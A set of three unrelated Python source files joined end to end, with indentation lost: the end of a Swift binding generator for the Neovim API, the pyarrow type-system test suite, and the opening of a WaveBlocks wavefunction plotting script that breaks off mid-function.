names = [p[1] for p in raw_params]
params = dict(zip(names, types))
result = '\n'.join([n + ': ' + t + ',' for n, t in params.items()])
if not result:
return ''
return '\n' + textwrap.indent(result, ' ')
def parse_params(raw_params):
types = [nvim_type_to_swift(p[0]) for p in raw_params]
names = [p[1] for p in raw_params]
params = dict(zip(names, types))
result = '\n'.join([swift_to_msgpack_value(n, t) + ',' for n, t in params.items()])
return textwrap.indent(result, ' ').strip()
def parse_function(f):
args = parse_args(f['parameters'])
template = void_func_template if f['return_type'] == 'void' else func_template
template = get_mode_func_template if f['name'] == 'nvim_get_mode' else template
result = template.substitute(
func_name=snake_to_camel(f['name'][5:]),
nvim_func_name=f['name'],
args=args,
params=parse_params(f['parameters']),
result_type=nvim_type_to_swift(f['return_type']),
return_value=msgpack_to_swift('value', nvim_type_to_swift(f['return_type']))
)
return result
def parse_version(version):
return '.'.join([str(v) for v in [version['major'], version['minor'], version['patch']]])
def parse_error_types(error_types):
return textwrap.indent(
'\n'.join(
[f'public static let {t.lower()}RawValue = UInt64({v["id"]})' for t, v in error_types.items()]
),
' '
).lstrip()
def parse_error_cases(error_types):
return textwrap.indent(
'\n'.join(
[f'case Error.{t.lower()}RawValue: self = .{t.lower()}(message: message)' for t, v in error_types.items()]
),
' '
).lstrip()
if __name__ == '__main__':
result_file_path = './Sources/RxPack/RxNeovimApi.generated.swift'
nvim_path = os.environ['NVIM_PATH'] if 'NVIM_PATH' in os.environ else 'nvim'
nvim_output = subprocess.run([nvim_path, '--api-info'], stdout=subprocess.PIPE)
api = msgpack.unpackb(nvim_output.stdout)
version = parse_version(api['version'])
functions = [f for f in api['functions'] if 'deprecated_since' not in f]
body = '\n'.join([parse_function(f) for f in functions])
result = extension_template.substitute(
body=body,
version=version,
error_types=parse_error_types(api['error_types']),
error_cases=parse_error_cases(api['error_types']),
buffer_type=api['types']['Buffer']['id'],
window_type=api['types']['Window']['id'],
tabpage_type=api['types']['Tabpage']['id']
)
with io.open(result_file_path, 'w') as api_methods_file:
api_methods_file.write(result)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
from collections.abc import Iterator
from functools import partial
import datetime
import sys
import pickle
import pytest
import pytz
import hypothesis as h
import hypothesis.strategies as st
import hypothesis.extra.pytz as tzst
import weakref
import numpy as np
import pyarrow as pa
import pyarrow.types as types
import pyarrow.tests.strategies as past
def get_many_types():
# returning them from a function is required because of pa.dictionary
# type holds a pyarrow array and test_array.py::test_toal_bytes_allocated
# checks that the default memory pool has zero allocated bytes
return (
pa.null(),
pa.bool_(),
pa.int32(),
pa.time32('s'),
pa.time64('us'),
pa.date32(),
pa.timestamp('us'),
pa.timestamp('us', tz='UTC'),
pa.timestamp('us', tz='Europe/Paris'),
pa.duration('s'),
pa.float16(),
pa.float32(),
pa.float64(),
pa.decimal128(19, 4),
pa.decimal256(76, 38),
pa.string(),
pa.binary(),
pa.binary(10),
pa.large_string(),
pa.large_binary(),
pa.list_(pa.int32()),
pa.list_(pa.int32(), 2),
pa.large_list(pa.uint16()),
pa.map_(pa.string(), pa.int32()),
pa.map_(pa.field('key', pa.int32(), nullable=False),
pa.field('value', pa.int32())),
pa.struct([pa.field('a', pa.int32()),
pa.field('b', pa.int8()),
pa.field('c', pa.string())]),
pa.struct([pa.field('a', pa.int32(), nullable=False),
pa.field('b', pa.int8(), nullable=False),
pa.field('c', pa.string())]),
pa.union([pa.field('a', pa.binary(10)),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_DENSE),
pa.union([pa.field('a', pa.binary(10)),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_DENSE,
type_codes=[4, 8]),
pa.union([pa.field('a', pa.binary(10)),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_SPARSE),
pa.union([pa.field('a', pa.binary(10), nullable=False),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_SPARSE),
pa.dictionary(pa.int32(), pa.string())
)
def test_is_boolean():
assert types.is_boolean(pa.bool_())
assert not types.is_boolean(pa.int8())
def test_is_integer():
signed_ints = [pa.int8(), pa.int16(), pa.int32(), pa.int64()]
unsigned_ints = [pa.uint8(), pa.uint16(), pa.uint32(), pa.uint64()]
for t in signed_ints + unsigned_ints:
assert types.is_integer(t)
for t in signed_ints:
assert types.is_signed_integer(t)
assert not types.is_unsigned_integer(t)
for t in unsigned_ints:
assert types.is_unsigned_integer(t)
assert not types.is_signed_integer(t)
assert not types.is_integer(pa.float32())
assert not types.is_signed_integer(pa.float32())
def test_is_floating():
for t in [pa.float16(), pa.float32(), pa.float64()]:
assert types.is_floating(t)
assert not types.is_floating(pa.int32())
def test_is_null():
assert types.is_null(pa.null())
assert not types.is_null(pa.list_(pa.int32()))
def test_null_field_may_not_be_non_nullable():
# ARROW-7273
with pytest.raises(ValueError):
pa.field('f0', pa.null(), nullable=False)
def test_is_decimal():
decimal128 = pa.decimal128(19, 4)
decimal256 = pa.decimal256(76, 38)
int32 = pa.int32()
assert types.is_decimal(decimal128)
assert types.is_decimal(decimal256)
assert not types.is_decimal(int32)
assert types.is_decimal128(decimal128)
assert not types.is_decimal128(decimal256)
assert not types.is_decimal128(int32)
assert not types.is_decimal256(decimal128)
assert types.is_decimal256(decimal256)
assert not types.is_decimal256(int32)
def test_is_list():
a = pa.list_(pa.int32())
b = pa.large_list(pa.int32())
c = pa.list_(pa.int32(), 3)
assert types.is_list(a)
assert not types.is_large_list(a)
assert not types.is_fixed_size_list(a)
assert types.is_large_list(b)
assert not types.is_list(b)
assert not types.is_fixed_size_list(b)
assert types.is_fixed_size_list(c)
assert not types.is_list(c)
assert not types.is_large_list(c)
assert not types.is_list(pa.int32())
def test_is_map():
m = pa.map_(pa.utf8(), pa.int32())
assert types.is_map(m)
assert not types.is_map(pa.int32())
fields = pa.map_(pa.field('key_name', pa.utf8(), nullable=False),
pa.field('value_name', pa.int32()))
assert types.is_map(fields)
entries_type = pa.struct([pa.field('key', pa.int8()),
pa.field('value', pa.int8())])
list_type = pa.list_(entries_type)
assert not types.is_map(list_type)
def test_is_dictionary():
assert types.is_dictionary(pa.dictionary(pa.int32(), pa.string()))
assert not types.is_dictionary(pa.int32())
def test_is_nested_or_struct():
struct_ex = pa.struct([pa.field('a', pa.int32()),
pa.field('b', pa.int8()),
pa.field('c', pa.string())])
assert types.is_struct(struct_ex)
assert not types.is_struct(pa.list_(pa.int32()))
assert types.is_nested(struct_ex)
assert types.is_nested(pa.list_(pa.int32()))
assert types.is_nested(pa.large_list(pa.int32()))
assert not types.is_nested(pa.int32())
def test_is_union():
for mode in [pa.lib.UnionMode_SPARSE, pa.lib.UnionMode_DENSE]:
assert types.is_union(pa.union([pa.field('a', pa.int32()),
pa.field('b', pa.int8()),
pa.field('c', pa.string())],
mode=mode))
assert not types.is_union(pa.list_(pa.int32()))
# TODO(wesm): is_map, once implemented
def test_is_binary_string():
assert types.is_binary(pa.binary())
assert not types.is_binary(pa.string())
assert not types.is_binary(pa.large_binary())
assert not types.is_binary(pa.large_string())
assert types.is_string(pa.string())
assert types.is_unicode(pa.string())
assert not types.is_string(pa.binary())
assert not types.is_string(pa.large_string())
assert not types.is_string(pa.large_binary())
assert types.is_large_binary(pa.large_binary())
assert not types.is_large_binary(pa.large_string())
assert not types.is_large_binary(pa.binary())
assert not types.is_large_binary(pa.string())
assert types.is_large_string(pa.large_string())
assert not types.is_large_string(pa.large_binary())
assert not types.is_large_string(pa.string())
assert not types.is_large_string(pa.binary())
assert types.is_fixed_size_binary(pa.binary(5))
assert not types.is_fixed_size_binary(pa.binary())
def test_is_temporal_date_time_timestamp():
date_types = [pa.date32(), pa.date64()]
time_types = [pa.time32('s'), pa.time64('ns')]
timestamp_types = [pa.timestamp('ms')]
duration_types = [pa.duration('ms')]
interval_types = [pa.month_day_nano_interval()]
for case in (date_types + time_types + timestamp_types + duration_types +
interval_types):
assert types.is_temporal(case)
for case in date_types:
assert types.is_date(case)
assert not types.is_time(case)
assert not types.is_timestamp(case)
assert not types.is_duration(case)
assert not types.is_interval(case)
for case in time_types:
assert types.is_time(case)
assert not types.is_date(case)
assert not types.is_timestamp(case)
assert not types.is_duration(case)
assert not types.is_interval(case)
for case in timestamp_types:
assert types.is_timestamp(case)
assert not types.is_date(case)
assert not types.is_time(case)
assert not types.is_duration(case)
assert not types.is_interval(case)
for case in duration_types:
assert types.is_duration(case)
assert not types.is_date(case)
assert not types.is_time(case)
assert not types.is_timestamp(case)
assert not types.is_interval(case)
for case in interval_types:
assert types.is_interval(case)
assert not types.is_date(case)
assert not types.is_time(case)
assert not types.is_timestamp(case)
assert not types.is_temporal(pa.int32())
def test_is_primitive():
assert types.is_primitive(pa.int32())
assert not types.is_primitive(pa.list_(pa.int32()))
@pytest.mark.parametrize(('tz', 'expected'), [
(pytz.utc, 'UTC'),
(pytz.timezone('Europe/Paris'), 'Europe/Paris'),
# StaticTzInfo.tzname returns with '-09' so we need to infer the timezone's
# name from the tzinfo.zone attribute
(pytz.timezone('Etc/GMT-9'), 'Etc/GMT-9'),
(pytz.FixedOffset(180), '+03:00'),
(datetime.timezone.utc, 'UTC'),
(datetime.timezone(datetime.timedelta(hours=1, minutes=30)), '+01:30')
])
def test_tzinfo_to_string(tz, expected):
assert pa.lib.tzinfo_to_string(tz) == expected
def test_dateutil_tzinfo_to_string():
pytest.importorskip("dateutil")
import dateutil.tz
tz = dateutil.tz.UTC
assert pa.lib.tzinfo_to_string(tz) == 'UTC'
tz = dateutil.tz.gettz('Europe/Paris')
assert pa.lib.tzinfo_to_string(tz) == 'Europe/Paris'
def test_zoneinfo_tzinfo_to_string():
zoneinfo = pytest.importorskip('zoneinfo')
tz = zoneinfo.ZoneInfo('UTC')
assert pa.lib.tzinfo_to_string(tz) == 'UTC'
tz = zoneinfo.ZoneInfo('Europe/Paris')
assert pa.lib.tzinfo_to_string(tz) == 'Europe/Paris'
def test_tzinfo_to_string_errors():
msg = "Not an instance of datetime.tzinfo"
with pytest.raises(TypeError):
pa.lib.tzinfo_to_string("Europe/Budapest")
if sys.version_info >= (3, 8):
# before 3.8 it was only possible to create timezone objects with whole
# number of minutes
tz = datetime.timezone(datetime.timedelta(hours=1, seconds=30))
msg = "Offset must represent whole number of minutes"
with pytest.raises(ValueError, match=msg):
pa.lib.tzinfo_to_string(tz)
@h.given(tzst.timezones())
def test_pytz_timezone_roundtrip(tz):
timezone_string = pa.lib.tzinfo_to_string(tz)
timezone_tzinfo = pa.lib.string_to_tzinfo(timezone_string)
assert timezone_tzinfo == tz
def test_convert_custom_tzinfo_objects_to_string():
class CorrectTimezone1(datetime.tzinfo):
"""
Conversion is using utcoffset()
"""
def tzname(self, dt):
return None
def utcoffset(self, dt):
return datetime.timedelta(hours=-3, minutes=30)
class CorrectTimezone2(datetime.tzinfo):
"""
Conversion is using tzname()
"""
def tzname(self, dt):
return "+03:00"
def utcoffset(self, dt):
return datetime.timedelta(hours=3)
class BuggyTimezone1(datetime.tzinfo):
"""
Unable to infer name or offset
"""
def tzname(self, dt):
return None
def utcoffset(self, dt):
return None
class BuggyTimezone2(datetime.tzinfo):
"""
Wrong offset type
"""
def tzname(self, dt):
return None
def utcoffset(self, dt):
return "one hour"
class BuggyTimezone3(datetime.tzinfo):
"""
Wrong timezone name type
"""
def tzname(self, dt):
return 240
def utcoffset(self, dt):
return None
assert pa.lib.tzinfo_to_string(CorrectTimezone1()) == "-02:30"
assert pa.lib.tzinfo_to_string(CorrectTimezone2()) == "+03:00"
msg = (r"Object returned by tzinfo.utcoffset\(None\) is not an instance "
r"of datetime.timedelta")
for wrong in [BuggyTimezone1(), BuggyTimezone2(), BuggyTimezone3()]:
with pytest.raises(ValueError, match=msg):
pa.lib.tzinfo_to_string(wrong)
@pytest.mark.parametrize(('string', 'expected'), [
('UTC', pytz.utc),
('Europe/Paris', pytz.timezone('Europe/Paris')),
('+03:00', pytz.FixedOffset(180)),
('+01:30', pytz.FixedOffset(90)),
('-02:00', pytz.FixedOffset(-120))
])
def test_string_to_tzinfo(string, expected):
result = pa.lib.string_to_tzinfo(string)
assert result == expected
@pytest.mark.parametrize('tz,name', [
(pytz.FixedOffset(90), '+01:30'),
(pytz.FixedOffset(-90), '-01:30'),
(pytz.utc, 'UTC'),
(pytz.timezone('America/New_York'), 'America/New_York')
])
def test_timezone_string_roundtrip(tz, name):
assert pa.lib.tzinfo_to_string(tz) == name
assert pa.lib.string_to_tzinfo(name) == tz
def test_timestamp():
for unit in ('s', 'ms', 'us', 'ns'):
for tz in (None, 'UTC', 'Europe/Paris'):
ty = pa.timestamp(unit, tz=tz)
assert ty.unit == unit
assert ty.tz == tz
for invalid_unit in ('m', 'arbit', 'rary'):
with pytest.raises(ValueError, match='Invalid time unit'):
pa.timestamp(invalid_unit)
def test_time32_units():
for valid_unit in ('s', 'ms'):
ty = pa.time32(valid_unit)
assert ty.unit == valid_unit
for invalid_unit in ('m', 'us', 'ns'):
error_msg = 'Invalid time unit for time32: {!r}'.format(invalid_unit)
with pytest.raises(ValueError, match=error_msg):
pa.time32(invalid_unit)
def test_time64_units():
for valid_unit in ('us', 'ns'):
ty = pa.time64(valid_unit)
assert ty.unit == valid_unit
for invalid_unit in ('m', 's', 'ms'):
error_msg = 'Invalid time unit for time64: {!r}'.format(invalid_unit)
with pytest.raises(ValueError, match=error_msg):
pa.time64(invalid_unit)
def test_duration():
for unit in ('s', 'ms', 'us', 'ns'):
ty = pa.duration(unit)
assert ty.unit == unit
for invalid_unit in ('m', 'arbit', 'rary'):
with pytest.raises(ValueError, match='Invalid time unit'):
pa.duration(invalid_unit)
def test_list_type():
ty = pa.list_(pa.int64())
assert isinstance(ty, pa.ListType)
assert ty.value_type == pa.int64()
assert ty.value_field == pa.field("item", pa.int64(), nullable=True)
with pytest.raises(TypeError):
pa.list_(None)
def test_large_list_type():
ty = pa.large_list(pa.utf8())
assert isinstance(ty, pa.LargeListType)
assert ty.value_type == pa.utf8()
assert ty.value_field == pa.field("item", pa.utf8(), nullable=True)
with pytest.raises(TypeError):
pa.large_list(None)
def test_map_type():
ty = pa.map_(pa.utf8(), pa.int32())
assert isinstance(ty, pa.MapType)
assert ty.key_type == pa.utf8()
assert ty.key_field == pa.field("key", pa.utf8(), nullable=False)
assert ty.item_type == pa.int32()
assert ty.item_field == pa.field("value", pa.int32(), nullable=True)
with pytest.raises(TypeError):
pa.map_(None)
with pytest.raises(TypeError):
pa.map_(pa.int32(), None)
with pytest.raises(TypeError):
pa.map_(pa.field("name", pa.string(), nullable=True), pa.int64())
def test_fixed_size_list_type():
ty = pa.list_(pa.float64(), 2)
assert isinstance(ty, pa.FixedSizeListType)
assert ty.value_type == pa.float64()
assert ty.value_field == pa.field("item", pa.float64(), nullable=True)
assert ty.list_size == 2
with pytest.raises(ValueError):
pa.list_(pa.float64(), -2)
def test_struct_type():
fields = [
# Duplicate field name on purpose
pa.field('a', pa.int64()),
pa.field('a', pa.int32()),
pa.field('b', pa.int32())
]
ty = pa.struct(fields)
assert len(ty) == ty.num_fields == 3
assert list(ty) == fields
assert ty[0].name == 'a'
assert ty[2].type == pa.int32()
with pytest.raises(IndexError):
assert ty[3]
assert ty['b'] == ty[2]
# Not found
with pytest.raises(KeyError):
ty['c']
# Neither integer nor string
with pytest.raises(TypeError):
ty[None]
for a, b in zip(ty, fields):
a == b
# Construct from list of tuples
ty = pa.struct([('a', pa.int64()),
('a', pa.int32()),
('b', pa.int32())])
assert list(ty) == fields
for a, b in zip(ty, fields):
a == b
# Construct from mapping
fields = [pa.field('a', pa.int64()),
pa.field('b', pa.int32())]
ty = pa.struct(OrderedDict([('a', pa.int64()),
('b', pa.int32())]))
assert list(ty) == fields
for a, b in zip(ty, fields):
a == b
# Invalid args
with pytest.raises(TypeError):
pa.struct([('a', None)])
def test_struct_duplicate_field_names():
fields = [
pa.field('a', pa.int64()),
pa.field('b', pa.int32()),
pa.field('a', pa.int32())
]
ty = pa.struct(fields)
# Duplicate
with pytest.warns(UserWarning):
with pytest.raises(KeyError):
ty['a']
# StructType::GetFieldIndex
assert ty.get_field_index('a') == -1
# StructType::GetAllFieldIndices
assert ty.get_all_field_indices('a') == [0, 2]
def test_union_type():
def check_fields(ty, fields):
assert ty.num_fields == len(fields)
assert [ty[i] for i in range(ty.num_fields)] == fields
fields = [pa.field('x', pa.list_(pa.int32())),
pa.field('y', pa.binary())]
type_codes = [5, 9]
sparse_factories = [
partial(pa.union, mode='sparse'),
partial(pa.union, mode=pa.lib.UnionMode_SPARSE),
pa.sparse_union,
]
dense_factories = [
partial(pa.union, mode='dense'),
partial(pa.union, mode=pa.lib.UnionMode_DENSE),
pa.dense_union,
]
for factory in sparse_factories:
ty = factory(fields)
assert isinstance(ty, pa.SparseUnionType)
assert ty.mode == 'sparse'
check_fields(ty, fields)
assert ty.type_codes == [0, 1]
ty = factory(fields, type_codes=type_codes)
assert ty.mode == 'sparse'
check_fields(ty, fields)
assert ty.type_codes == type_codes
# Invalid number of type codes
with pytest.raises(ValueError):
factory(fields, type_codes=type_codes[1:])
for factory in dense_factories:
ty = factory(fields)
assert isinstance(ty, pa.DenseUnionType)
assert ty.mode == 'dense'
check_fields(ty, fields)
assert ty.type_codes == [0, 1]
ty = factory(fields, type_codes=type_codes)
assert ty.mode == 'dense'
check_fields(ty, fields)
assert ty.type_codes == type_codes
# Invalid number of type codes
with pytest.raises(ValueError):
factory(fields, type_codes=type_codes[1:])
for mode in ('unknown', 2):
with pytest.raises(ValueError, match='Invalid union mode'):
pa.union(fields, mode=mode)
def test_dictionary_type():
ty0 = pa.dictionary(pa.int32(), pa.string())
assert ty0.index_type == pa.int32()
assert ty0.value_type == pa.string()
assert ty0.ordered is False
ty1 = pa.dictionary(pa.int8(), pa.float64(), ordered=True)
assert ty1.index_type == pa.int8()
assert ty1.value_type == pa.float64()
assert ty1.ordered is True
# construct from non-arrow objects
ty2 = pa.dictionary('int8', 'string')
assert ty2.index_type == pa.int8()
assert ty2.value_type == pa.string()
assert ty2.ordered is False
# allow unsigned integers for index type
ty3 = pa.dictionary(pa.uint32(), pa.string())
assert ty3.index_type == pa.uint32()
assert ty3.value_type == pa.string()
assert ty3.ordered is False
# invalid index type raises
with pytest.raises(TypeError):
pa.dictionary(pa.string(), pa.int64())
def test_dictionary_ordered_equals():
# Python side checking of ARROW-6345
d1 = pa.dictionary('int32', 'binary', ordered=True)
d2 = pa.dictionary('int32', 'binary', ordered=False)
d3 = pa.dictionary('int8', 'binary', ordered=True)
d4 = pa.dictionary('int32', 'binary', ordered=True)
assert not d1.equals(d2)
assert not d1.equals(d3)
assert d1.equals(d4)
def test_types_hashable():
many_types = get_many_types()
in_dict = {}
for i, type_ in enumerate(many_types):
assert hash(type_) == hash(type_)
in_dict[type_] = i
assert len(in_dict) == len(many_types)
for i, type_ in enumerate(many_types):
assert in_dict[type_] == i
def test_types_picklable():
for ty in get_many_types():
data = pickle.dumps(ty)
assert pickle.loads(data) == ty
def test_types_weakref():
for ty in get_many_types():
wr = weakref.ref(ty)
assert wr() is not None
# Note that ty may be a singleton and therefore outlive this loop
wr = weakref.ref(pa.int32())
assert wr() is not None # singleton
wr = weakref.ref(pa.list_(pa.int32()))
assert wr() is None # not a singleton
def test_fields_hashable():
in_dict = {}
fields = [pa.field('a', pa.int32()),
pa.field('a', pa.int64()),
pa.field('a', pa.int64(), nullable=False),
pa.field('b', pa.int32()),
pa.field('b', pa.int32(), nullable=False)]
for i, field in enumerate(fields):
in_dict[field] = i
assert len(in_dict) == len(fields)
for i, field in enumerate(fields):
assert in_dict[field] == i
def test_fields_weakrefable():
field = pa.field('a', pa.int32())
wr = weakref.ref(field)
assert wr() is not None
del field
assert wr() is None
@pytest.mark.parametrize('t,check_func', [
(pa.date32(), types.is_date32),
(pa.date64(), types.is_date64),
(pa.time32('s'), types.is_time32),
(pa.time64('ns'), types.is_time64),
(pa.int8(), types.is_int8),
(pa.int16(), types.is_int16),
(pa.int32(), types.is_int32),
(pa.int64(), types.is_int64),
(pa.uint8(), types.is_uint8),
(pa.uint16(), types.is_uint16),
(pa.uint32(), types.is_uint32),
(pa.uint64(), types.is_uint64),
(pa.float16(), types.is_float16),
(pa.float32(), types.is_float32),
(pa.float64(), types.is_float64)
])
def test_exact_primitive_types(t, check_func):
assert check_func(t)
def test_type_id():
# enum values are not exposed publicly
for ty in get_many_types():
assert isinstance(ty.id, int)
def test_bit_width():
for ty, expected in [(pa.bool_(), 1),
(pa.int8(), 8),
(pa.uint32(), 32),
(pa.float16(), 16),
(pa.decimal128(19, 4), 128),
(pa.decimal256(76, 38), 256),
(pa.binary(42), 42 * 8)]:
assert ty.bit_width == expected
for ty in [pa.binary(), pa.string(), pa.list_(pa.int16())]:
with pytest.raises(ValueError, match="fixed width"):
ty.bit_width
def test_fixed_size_binary_byte_width():
ty = pa.binary(5)
assert ty.byte_width == 5
def test_decimal_properties():
ty = pa.decimal128(19, 4)
assert ty.byte_width == 16
assert ty.precision == 19
assert ty.scale == 4
ty = pa.decimal256(76, 38)
assert ty.byte_width == 32
assert ty.precision == 76
assert ty.scale == 38
def test_decimal_overflow():
pa.decimal128(1, 0)
pa.decimal128(38, 0)
for i in (0, -1, 39):
with pytest.raises(ValueError):
pa.decimal128(i, 0)
pa.decimal256(1, 0)
pa.decimal256(76, 0)
for i in (0, -1, 77):
with pytest.raises(ValueError):
pa.decimal256(i, 0)
def test_type_equality_operators():
many_types = get_many_types()
non_pyarrow = ('foo', 16, {'s', 'e', 't'})
for index, ty in enumerate(many_types):
# could use two parametrization levels,
# but that'd bloat pytest's output
for i, other in enumerate(many_types + non_pyarrow):
if i == index:
assert ty == other
else:
assert ty != other
def test_key_value_metadata():
m = pa.KeyValueMetadata({'a': 'A', 'b': 'B'})
assert len(m) == 2
assert m['a'] == b'A'
assert m[b'a'] == b'A'
assert m['b'] == b'B'
assert 'a' in m
assert b'a' in m
assert 'c' not in m
m1 = pa.KeyValueMetadata({'a': 'A', 'b': 'B'})
m2 = pa.KeyValueMetadata(a='A', b='B')
m3 = pa.KeyValueMetadata([('a', 'A'), ('b', 'B')])
assert m1 != 2
assert m1 == m2
assert m2 == m3
assert m1 == {'a': 'A', 'b': 'B'}
assert m1 != {'a': 'A', 'b': 'C'}
with pytest.raises(TypeError):
pa.KeyValueMetadata({'a': 1})
with pytest.raises(TypeError):
pa.KeyValueMetadata({1: 'a'})
with pytest.raises(TypeError):
pa.KeyValueMetadata(a=1)
expected = [(b'a', b'A'), (b'b', b'B')]
result = [(k, v) for k, v in m3.items()]
assert result == expected
assert list(m3.items()) == expected
assert list(m3.keys()) == [b'a', b'b']
assert list(m3.values()) == [b'A', b'B']
assert len(m3) == 2
# test duplicate key support
md = pa.KeyValueMetadata([
('a', 'alpha'),
('b', 'beta'),
('a', 'Alpha'),
('a', 'ALPHA'),
])
expected = [
(b'a', b'alpha'),
(b'b', b'beta'),
(b'a', b'Alpha'),
(b'a', b'ALPHA')
]
assert len(md) == 4
assert isinstance(md.keys(), Iterator)
assert isinstance(md.values(), Iterator)
assert isinstance(md.items(), Iterator)
assert list(md.items()) == expected
assert list(md.keys()) == [k for k, _ in expected]
assert list(md.values()) == [v for _, v in expected]
# first occurrence
assert md['a'] == b'alpha'
assert md['b'] == b'beta'
assert md.get_all('a') == [b'alpha', b'Alpha', b'ALPHA']
assert md.get_all('b') == [b'beta']
assert md.get_all('unkown') == []
with pytest.raises(KeyError):
md = pa.KeyValueMetadata([
('a', 'alpha'),
('b', 'beta'),
('a', 'Alpha'),
('a', 'ALPHA'),
], b='BETA')
def test_key_value_metadata_duplicates():
meta = pa.KeyValueMetadata({'a': '1', 'b': '2'})
with pytest.raises(KeyError):
pa.KeyValueMetadata(meta, a='3')
def test_field_basic():
t = pa.string()
f = pa.field('foo', t)
assert f.name == 'foo'
assert f.nullable
assert f.type is t
assert repr(f) == "pyarrow.Field<foo: string>"
f = pa.field('foo', t, False)
assert not f.nullable
with pytest.raises(TypeError):
pa.field('foo', None)
def test_field_equals():
meta1 = {b'foo': b'bar'}
meta2 = {b'bizz': b'bazz'}
f1 = pa.field('a', pa.int8(), nullable=True)
f2 = pa.field('a', pa.int8(), nullable=True)
f3 = pa.field('a', pa.int8(), nullable=False)
f4 = pa.field('a', pa.int16(), nullable=False)
f5 = pa.field('b', pa.int16(), nullable=False)
f6 = pa.field('a', pa.int8(), nullable=True, metadata=meta1)
f7 = pa.field('a', pa.int8(), nullable=True, metadata=meta1)
f8 = pa.field('a', pa.int8(), nullable=True, metadata=meta2)
assert f1.equals(f2)
assert f6.equals(f7)
assert not f1.equals(f3)
assert not f1.equals(f4)
assert not f3.equals(f4)
assert not f4.equals(f5)
# No metadata in f1, but metadata in f6
assert f1.equals(f6)
assert not f1.equals(f6, check_metadata=True)
# Different metadata
assert f6.equals(f7)
assert f7.equals(f8)
assert not f7.equals(f8, check_metadata=True)
def test_field_equality_operators():
f1 = pa.field('a', pa.int8(), nullable=True)
f2 = pa.field('a', pa.int8(), nullable=True)
f3 = pa.field('b', pa.int8(), nullable=True)
f4 = pa.field('b', pa.int8(), nullable=False)
assert f1 == f2
assert f1 != f3
assert f3 != f4
assert f1 != 'foo'
def test_field_metadata():
f1 = pa.field('a', pa.int8())
f2 = pa.field('a', pa.int8(), metadata={})
f3 = pa.field('a', pa.int8(), metadata={b'bizz': b'bazz'})
assert f1.metadata is None
assert f2.metadata == {}
assert f3.metadata[b'bizz'] == b'bazz'
def test_field_add_remove_metadata():
import collections
f0 = pa.field('foo', pa.int32())
assert f0.metadata is None
metadata = {b'foo': b'bar', b'pandas': b'badger'}
metadata2 = collections.OrderedDict([
(b'a', b'alpha'),
(b'b', b'beta')
])
f1 = f0.with_metadata(metadata)
assert f1.metadata == metadata
f2 = f0.with_metadata(metadata2)
assert f2.metadata == metadata2
with pytest.raises(TypeError):
f0.with_metadata([1, 2, 3])
f3 = f1.remove_metadata()
assert f3.metadata is None
# idempotent
f4 = f3.remove_metadata()
assert f4.metadata is None
f5 = pa.field('foo', pa.int32(), True, metadata)
f6 = f0.with_metadata(metadata)
assert f5.equals(f6)
def test_field_modified_copies():
f0 = pa.field('foo', pa.int32(), True)
f0_ = pa.field('foo', pa.int32(), True)
assert f0.equals(f0_)
f1 = pa.field('foo', pa.int64(), True)
f1_ = f0.with_type(pa.int64())
assert f1.equals(f1_)
# Original instance is unmodified
assert f0.equals(f0_)
f2 = pa.field('foo', pa.int32(), False)
f2_ = f0.with_nullable(False)
assert f2.equals(f2_)
# Original instance is unmodified
assert f0.equals(f0_)
f3 = pa.field('bar', pa.int32(), True)
f3_ = f0.with_name('bar')
assert f3.equals(f3_)
# Original instance is unmodified
assert f0.equals(f0_)
def test_is_integer_value():
assert pa.types.is_integer_value(1)
assert pa.types.is_integer_value(np.int64(1))
assert not pa.types.is_integer_value('1')
def test_is_float_value():
assert not pa.types.is_float_value(1)
assert pa.types.is_float_value(1.)
assert pa.types.is_float_value(np.float64(1))
assert not pa.types.is_float_value('1.0')
def test_is_boolean_value():
assert not pa.types.is_boolean_value(1)
assert pa.types.is_boolean_value(True)
assert pa.types.is_boolean_value(False)
assert pa.types.is_boolean_value(np.bool_(True))
assert pa.types.is_boolean_value(np.bool_(False))
@h.given(
past.all_types |
past.all_fields |
past.all_schemas
)
@h.example(
pa.field(name='', type=pa.null(), metadata={'0': '', '': ''})
)
def test_pickling(field):
data = pickle.dumps(field)
assert pickle.loads(data) == field
@h.given(
st.lists(past.all_types) |
st.lists(past.all_fields) |
st.lists(past.all_schemas)
)
def test_hashing(items):
h.assume(
# well, this is still O(n^2), but makes the input unique
all(not a.equals(b) for i, a in enumerate(items) for b in items[:i])
)
container = {}
for i, item in enumerate(items):
assert hash(item) == hash(item)
container[item] = i
assert len(container) == len(items)
for i, item in enumerate(items):
assert container[item] == i
|
|
"""The WaveBlocks Project
Plot the wavefunctions probability densities in the eigenbasis.
Additionally plot the spawned wavepackets.
The plot can be splitted into 4 subplots corresponding to the
left and the right of a barrier potential.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011 R. Bourquin
@license: Modified BSD License
"""
import sys
from numpy import angle, conj, real, imag
from matplotlib.pyplot import *
from WaveBlocks import PotentialFactory
from WaveBlocks import IOManager
from WaveBlocks.Plot import plotcf
import GraphicsDefaults as GD
def plot_frames(iom, gid=0, view=None, plotphase=True, plotcomponents=False, plotabssqr=False, imgsize=(12,9)):
"""Plot the wave function for a series of timesteps.
:param iom: An ``IOManager`` instance providing the simulation data.
:param gid: The group ID of the group where the two packets are stored.
:param view: The aspect ratio.
:param plotphase: Whether to plot the complex phase. (slow)
:param plotcomponents: Whether to plot the real/imaginary parts..
:param plotabssqr: Whether to plot the absolute value squared.
"""
parameters = iom.load_parameters()
# Block IDs for mother and child wavepacket
bidm, bidc = iom.get_block_ids(groupid=gid)
grid = iom.load_grid(blockid="global")
# Precompute eigenvectors for efficiency
Potential = PotentialFactory().create_potential(parameters)
eigenvectors = Potential.evaluate_eigenvectors_at(grid)
timegrid = iom.load_wavefunction_timegrid(blockid=bidm)
for step in timegrid:
print(" Timestep # " + str(step))
# Retrieve spawn data for both packets
try:
wave_m = iom.load_wavefunction(timestep=step, blockid=bidm)
